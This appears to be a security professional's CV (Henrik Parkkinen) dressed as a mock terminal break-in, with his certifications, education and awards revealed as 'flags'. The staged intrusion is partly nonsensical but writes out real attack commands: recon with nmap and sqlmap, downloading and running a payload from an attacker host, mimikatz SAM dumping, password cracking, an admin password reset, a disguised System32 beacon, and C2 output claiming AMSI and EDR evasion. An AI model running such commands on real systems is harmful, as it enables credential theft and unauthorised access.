System is starting up!
Loading up things...
###### LOADING! #######
CPU warm-up.......[ OK ]
GPU warm-up.......[ OK ]
Int. RAM..........[ OK ]
Int. HD0001.......[ OK ]
Int. HD0002.......[ OK ]
Int. LUN00014.....[ OK ]
Int. LUN00015.....[ OK ]
Int. settings.....[ OK ]
Connecting TOR....[ OK ]
Proxy chains......[ OK ]
Secret stuff......[ OK ]
Loading GUI.......[ OK ]
Loading AI........[ OK ]
Randomizing.......[ OK ]
Completing........[ OK ]
##### COMPLETED! #####
┌──(kali㉿kali)-[~] whoami
kali
└─$ hostname h4x
└─$ uptime 00:01:09
└─$ pwd /home/kali
└─$ cd /home/Henrik Parkkinen
└─$ su Henrik Parkkinen
Password:
└─$ whoami
Henrik Parkkinen
└─$
└─$
└─$
└─$ nmap -sV [REDACTED]
[+] Enumerating services...
22/tcp open ssh
53/tcp dns
53/udp dns
80/tcp open nginx
443/tcp open cloudflare
1337/tcp open Service
8080/tcp open cloudflare
└─$
└─$
└─$
└─$ gobuster dir -u https[:]//[REDACTED]
/admin
/api/v1
/dev
/login
/signup
/1337
/cat_pictures
/config
└─$
└─$
└─$
└─$ sqlmap -u [REDACTED]/1337?id=1
[CRITICAL] injectable parameter found
└─$
└─$
└─$
└─$ whoami 2>/dev/null > 3v1lrpc.txt
└─$ gcc 3v1lrpc.txt -o 3v1lrpc.exe
└─$ python3 -m http.server 443
└─$ nc [TARGET IP] 1337
└─$ 3vil$h3ll:>
Connected to target machine!
#CONNECTION
#TO
#EVIL
#AND
#SNEAKY
#BACKDOOR
#SUCCESSFULLY
#ESTABLISHED!
##### ACCESS GRANTED #####
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> /bin/bash -i
└─$ 3vil$h3ll:> whoami
NT/Guest
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> wget https[:]//h4x/3v1lrpc.exe
└─$ 3vil$h3ll:> chmod +x 3v1lrpc.exe
└─$ 3vil$h3ll:> ./3v1lrpc.exe
##################################
###########3v1lrpc.exe############
##################################
[loading*] 3v1lrpc.exe ...
[loading completed*]
Set Options:
rports: [*]
rhosts: [*]
payload: [*]
lhost: [127.0.0.1]
aux: [nc]
eternal blue: [True]
Run exploit: Y
[processing*]
[payload initiated*]
[exploit checking*]
[exploit running*]
-----------------------------------
[PAYLOAD BUFFER]
-----------------------------------
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
.....-=$[HACKING ONGOING]$=-.....
WARNING!
APESHIT UNLEASHED ON ALL PORTS
[RPC Exploitations Ongoing*]
...Time to drink coffee...
...Guessing random ports...
...Shooting 3v1l payloads...
...#65355 is the answer...
...GL HF GG...
...3v1l sh1t...
...<VOID>...
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
-----------------------------------
[/PAYLOAD BUFFER]
-----------------------------------
[exploit*] 100% completed!
[exploit*] successful!
[hidden flag found*]
e1Nob3cgSGVucmlrIFBhcmtraW5lbidzIGZ1bGwgcHJvZmlsZSBieSBleGVjdXRpbmcgbmV0IHVzZXIgSGVucmlrIFBhcmtraW5lbiAvYWxsIGluIGNtZH0=
##################################
###########3v1lrpc.exe############
##################################
└─$ 3vil$h3ll:> base64 -d flag.txt
[REDACTED]
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> shell
└─$ C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> net user Henrik Parkkinen
#PROFILE
Name: Henrik Parkkinen
Entity: www[.]HenrikParkkinen[.]com
Country: Sweden
Location: Remote [From Planet Earth]
Language: Swedish, English & Finnish
Experience: +20 years
Role: ZybR C:qr1ty g33k
Title: <VOID>
Understands: Digital ecosystem, Emerging technologies, Business Management, Cyber attack & threat landscape, Offensive Security, Defensive Security, Infrastructure, Enterprise & Security Architecture
Background: Offensive, Defensive, Technical, Hands-on, Management, Leadership, Security Architecture
Strengths: Analytical, Strategic thinking, Team-player, Leader
Communication: All levels. Technical SMEs to C-level, Boards & Executives
Presentation skills: Strong, both visual and verbal
Mindset: Pragmatic, Progressive, Self-reflecting & gets sh*t done
Attitude: Positive, Calm & Authentic
H4xing: Kali Linux, Impacket, nxc, Metasploit, msfvenom, Armitage, Cobalt Strike, Sliver, Nessus, Hydra, John, Hashcat, gobuster, dirbuster, ssh, ligolo-ng, Burp, ZAP, smbclient, WireShark, NMAP, rustscan, dig, OSINT, PowerView, Bloodhound, nc, Mimikatz, SQLMAP, Notepad
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> cd\
└─$ C:\> dir /s "userflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Henrik Parkkinen\Desktop
xxxx-yy-zz 02:49 userflag.txt
1 File(s) 90 bytes
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> cd C:\Users\Henrik Parkkinen\Desktop
└─$ C:\Users\Henrik Parkkinen\Desktop> more userflag.txt
#KNOWLEDGE, EXPERIENCE & EDUCATION [VERBOSE MODE]
#Certifications & Certificates
CISM - ISACA
CISA - ISACA
CRISC - ISACA
CGEIT - ISACA
COBIT - ISACA
CCSK - CSA
eJPT - eLearnSecurity
MCP - MSFT
PNPT - TCM Security
CRTO - ZPS
C-ADPenX - The SecOps Group
CRTeamer - The SecOps Group
CNPEN - The SecOps Group
CRTA - CWL
MCRTA - CWL
AD-RTS - CWL
ISO27K LA - MA
[OBSOLETE]
MCITP: Ent Admin - MSFT
MCTS - MSFT
MCSE: SEC - MSFT
MCSA: SEC - MSFT
MCSE - MSFT
MCSA - MSFT
#Frameworks & Standards
NIST CSF
COBIT
CCM CSA
ISO 27001
CIS CSC
ITIL
MITRE ATT&CK
#Cyber & Info Sec skills
Sec Assessments
Sec Auditing
Governance
Cloud Sec
Risk Mgmt
Strategy
Mgmt Consulting
Threat Modelling
Sec Architecture
3rd & Supply Chain Sec
#Assignments & Exp.
Officer
Advisor
Architect
Strategist
Specialist
<Prefix> Leader
<Prefix> Manager
#EDUCATION
The State UNV of New York
International cyber conflicts
Delft UNV of Technology
Cyber security economics
UNV of Washington
Info sec & risk mgmt context
Building an info sec risk mgmt toolkit
Designing & executing info sec starts
Higher Vocational IT Education
Infra, NW, FW, & IT-sec
+multiple vendor courses & lectures
#Leadership & Mgmt EDU
Individual Leadership Dev & Growth
Leading Leaders
Self-leadership
LMI International
Building & Leading Teams
Personal Leadership
Schinkler Management
Building The Winning Team
Focus Consulting
Leadership & Business Mgmt
Vendita
Effective Communication
#Volunteering & Accomplishments
ISACA – SME Review: CRISC RM 7th
ISACA – SME Review: DTEF
#Recognitions
Top 9 in Cybersecurity strategy & leadership – 2025
Top 12 GRC Leaders – 2025
Top 20 Cybersecurity Influencers – 2025
Top 25 CISOs – 2025
Top 50 Cybersecurity Influencers & Experts – 2025
Top 50 Thought Leader in GRC – 2025
Top 100 Thought Leader in Cybersecurity – 2025
Top 10 Cybersecurity Leaders in EMEA – 2024
Top 50 CISOs & Cybersecurity Leaders – 2024
Top 16 Cybersecurity influencers in the industry – 2024
TOP 25 Influential CISOs & Cybersecurity Leaders 2024
TOP 50 CISOs & Cybersecurity Leaders 2024
Global 40 under 40 in Cybersecurity 2023
#Fun
THM – Top 1% [Global], Top 30 [Sweden] ((in the past) whatever this means)
#Epilogue
Stay Curious. Hack Stuff. Be Creative. Laugh. Improve. Resilience. Together. Protect. Be Cool. Relax. Share Knowledge. Wisdom. G33k. Inspire Others. Authenticity. Think. Positive Mindset. 1337. Chill. Good Vibes. Security. Recon. whoami. Learn. Contemplate. Be Kind.
└─$ C:\Users\Henrik Parkkinen\Desktop> cd\
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> echo coffee break. brb
coffee break. brb
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> dir /s "rootflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Administrator
xxxx-yy-zz 04:15 rootflag.txt
1 File(s) 12 bytes
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
Access Denied
└─$ C:\Users\Administrator> cd C:\Temp
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> wget https://h4x/mimikatz.exe
└─$ C:\Temp> mimikatz.exe
.#####. mimikatz, "Kiwi"
.## ^ ##.
## / \ ## /* * *
## \ / ## [REDACTED INFO]
'## v ##' [REDACTED WEBSITE]
'#####'
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
Domain: [REDACTED]
SysKey: [REDACTED]
Local SID: [REDACTED]
SAMKey: [REDACTED]
RID: [REDACTED]
User: Administrator
Hash NTLM: [REDACTED]
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> background
└─$ 3vil$h3ll:> john -w=rockyou.txt hash.txt
Done!
The Password is: [REDACTED]
└─$ 3vil$h3ll:> shell
└─$ C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$ C:\Windows\System32> cd\
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> net user administrator [REDACTED]
The command completed successfully
└─$ C:\> whoami
NT/Administrator
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
----------[Hidden Message: Start]----------
#Top secret message
----------[Hidden Message: End]----------
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> cd C:\Windows\System32
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> upload ms_updater.exe
└─$ C:\Windows\System32> ./ms_updater.exe
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> exit
└─$ 3vil$h3ll:> exit
└─$
└─$
└─$
└─$ sudo ./NinjaGhostC2 --profile sneaky --transport dns --sleep 45
===============================
<<<<<:[COMMAND & CONTROL]:>>>>>
===============================
-^^--^^--^^--^^--^^--^^--^^-
............................
............................
.........../\_/\...Meeow!...
..........( o.o )...........
...........> ^ <............
....||=============||.......
....||----Ninja----||.......
....||---GhostC2---||.......
....||=============||.......
............................
............................
===============================
<<<<<<:[SNEAKY AS A CAT]:>>>>>>
===============================
===============================
....FRAMEWORK INITIALIZATION...
===============================
[>] Loading runtime modules…
[>] Initializing operator console…
[>] Verifying encrypted transport…
[>] Loading malleable profiles…
[>] Obfuscating syscall layer…
[>] Patching AMSI interfaces…
[>] Disabling ETW telemetry…
[>] Building reflective payloads…
[>] Registering HTTPS listener…
[>] Generating session keys…
[>] Syncing redirector nodes…
[>] Establishing C2 channels…
[>] Loading pivot manager…
[>] Starting SOCKS relay subsystem…
[>] Enabling beacon jitter…
[>] Validating OPSEC configuration…
[>] Starting task scheduler…
[>] Deploying sleep masks…
[>] Finalizing framework startup…
[>] Waiting for beacon callbacks…
===============================
.....TEAMSERVER CONNECTION.....
===============================
[*] Connecting to teamserver…
[*] Authenticated operator: armitage
[*] Listener started: dns
[*] Beacon check-ins enabled
===============================
.........OPSEC SETTINGS........
===============================
[OPSEC] Malleable profile applied
[OPSEC] In-memory loader encrypted
[OPSEC] Sleep interval randomized
[OPSEC] Defender exclusions verified
[OPSEC] API hooks resolved
[OPSEC] Memory signatures masked
[OPSEC] RWX memory regions sanitized
[OPSEC] Userland hooks bypassed
[OPSEC] Syscall stubs refreshed
[OPSEC] Named pipe transport enabled
[OPSEC] EDR heuristics evaded
[OPSEC] CLR execution isolated
[OPSEC] Thread stack spoofed
[OPSEC] Beacon entropy increased
[OPSEC] Indirect syscalls enabled
===============================
........ACTIVE BEACONS.........
===============================
[+] SYSTEM integrity beacon checked in
teamserver> info
[*] Host: [REDACTED]
[*] User: NT AUTHORITY\SYSTEM
[*] Token: System
[*] Integrity: High
[*] IP: [REDACTED]
[*] PID: 31337
[*] OS: Windows 2026 Server Enterprise
[*] Transport: DNS
[*] Beacon: ms_updater.exe
[*] Beacon size: 212 kb
[*] Location: C:\Windows\System32
[*] Session: 0
[*] Arch: x64
[*] Kill Date: N/A
[*] Pivoting: Enabled
[*] SOCKS5: Active (127.0.0.1:1080)
[*] Sleep: 141s (Jitter: 28%)
[*] Last check-in: 00s ago
[*] Listener: dns
[*] up time: 56s
teamserver> background
└─$
└─$
└─$
└─$ clear
└─$
└─$
└─$
└─$ exit
└─$ shutdown now
The system is shutting down NOW!
Broadcast message from:
Henrik Parkkinen
Message:
Follow the white rabbit...
Purging history cache....[ OK ]
Deleting temp things.....[ OK ]
Doing funky stuff =).....[ OK ]
LUN00014 unmount.........[ OK ]
LUN00015 unmount.........[ OK ]
Purging virtual memory...[ OK ]
Recycling something......[ OK ]
Stopping http server.....[ OK ]
Stopping all services....[ OK ]
Disconnecting TOR........[ OK ]
Killing all processes....[ OK ]
==== SYSTEM POWERED OFF ====
... 72 HOURS LATER
System is starting up!
Loading up things...
###### LOADING! #######
CPU warm-up.......[ OK ]
GPU warm-up.......[ OK ]
Int. RAM..........[ OK ]
Int. HD0001.......[ OK ]
Int. HD0002.......[ OK ]
Int. LUN00014.....[ OK ]
Int. LUN00015.....[ OK ]
Int. settings.....[ OK ]
Connecting TOR....[ OK ]
Proxy chains......[ OK ]
Secret stuff......[ OK ]
Loading GUI.......[ OK ]
Loading AI........[ OK ]
Randomizing.......[ OK ]
Completing........[ OK ]
##### COMPLETED! #####
└─$
└─$
└─$
└─$ sudo ./NinjaGhostC2 --profile sneaky --transport dns --sleep 45
===============================
<<<<<:[COMMAND & CONTROL]:>>>>>
===============================
-^^--^^--^^--^^--^^--^^--^^-
............................
............................
.........../\_/\...Meeow!...
..........( o.o )...........
...........> ^ <............
....||=============||.......
....||----Ninja----||.......
....||---GhostC2---||.......
....||=============||.......
............................
............................
===============================
<<<<<<:[SNEAKY AS A CAT]:>>>>>>
===============================
===============================
....FRAMEWORK INITIALIZATION...
===============================
[>] Loading runtime modules…
[>] Initializing operator console…
[>] Verifying encrypted transport…
[>] Loading malleable profiles…
[>] Obfuscating syscall layer…
[>] Patching AMSI interfaces…
[>] Disabling ETW telemetry…
[>] Building reflective payloads…
[>] Registering HTTPS listener…
[>] Generating session keys…
[>] Syncing redirector nodes…
[>] Establishing C2 channels…
[>] Loading pivot manager…
[>] Starting SOCKS relay subsystem…
[>] Enabling beacon jitter…
[>] Validating OPSEC configuration…
[>] Starting task scheduler…
[>] Deploying sleep masks…
[>] Finalizing framework startup…
[>] Waiting for beacon callbacks…
===============================
.....TEAMSERVER CONNECTION.....
===============================
[*] Connecting to teamserver…
[*] Authenticated operator: armitage
[*] Listener started: dns
[*] Beacon check-ins enabled
===============================
.........OPSEC SETTINGS........
===============================
[OPSEC] Malleable profile applied
[OPSEC] In-memory loader encrypted
[OPSEC] Sleep interval randomized
[OPSEC] Defender exclusions verified
[OPSEC] API hooks resolved
[OPSEC] Memory signatures masked
[OPSEC] RWX memory regions sanitized
[OPSEC] Userland hooks bypassed
[OPSEC] Syscall stubs refreshed
[OPSEC] Named pipe transport enabled
[OPSEC] EDR heuristics evaded
[OPSEC] CLR execution isolated
[OPSEC] Thread stack spoofed
[OPSEC] Beacon entropy increased
[OPSEC] Indirect syscalls enabled
===============================
........ACTIVE BEACONS.........
===============================
[+] SYSTEM integrity beacon checked in
ms_updater.exe @ [REDACTED]
teamserver>
teamserver>
teamserver>
teamserver> info
[*] Host: [REDACTED]
[*] User: NT AUTHORITY\SYSTEM
[*] Token: System
[*] Integrity: High
[*] IP: [REDACTED]
[*] PID: 31337
[*] OS: Windows 2026 Server Enterprise
[*] Transport: DNS
[*] Beacon: ms_updater.exe
[*] Beacon size: 212 kb
[*] Location: C:\Windows\System32
[*] Session: 0
[*] Arch: x64
[*] Kill Date: N/A
[*] Pivoting: Enabled
[*] SOCKS5: Active (127.0.0.1:1080)
[*] Sleep: 141s (Jitter: 28%)
[*] Last check-in: 00s ago
[*] Listener: dns
[*] up time: 72h & 56s
teamserver>
teamserver>
teamserver>
teamserver> jump scshell64 [REDACTED] smb
[+] SYSTEM integrity beacon checked in
svchost.exe @ [REDACTED]
teamserver>
teamserver>
teamserver>
teamserver> beacons
----------------------------------------
ID --- Host ---- User --- Process
----------------------------------------
01....[XYZ].....SYSTEM...ms_updater.exe
02....[XYZ].....SYSTEM...svchost.exe
[+] 2 active beacons
teamserver>
teamserver>
teamserver> use 02
[*] Interacting with beacon 02
[*] Host [XYZ]
[*] User: SYSTEM
[*] Integrity: High
teamserver>
teamserver>
teamserver>
teamserver> krb_triage
[*] Enumerating Kerberos tickets...
[*] Extracting active logon sessions...
[*] Parsing TGT/TGS cache entries...
─────────────────────────
LOGON SESSION 0x0003e7
─────────────────────────
User: NT AUTHORITY\SYSTEM
Domain: corp.local
Logon Type: service
─────────────────────────
[*] Kerberos ticket cache
─────────────────────────
User: SYSTEM$
Ticket: krbtgt/CORP.LOCAL
Realm: corp.local
Renewable: True
Encryption: AES256
User: svc-backup
Ticket: cifs/FILE01
Realm: corp.local
Renewable: True
Encryption: AES256
─────────────────────────
[*] Total tickets recovered: 2
[*] Ticket cache integrity: Valid
teamserver>
teamserver>
teamserver>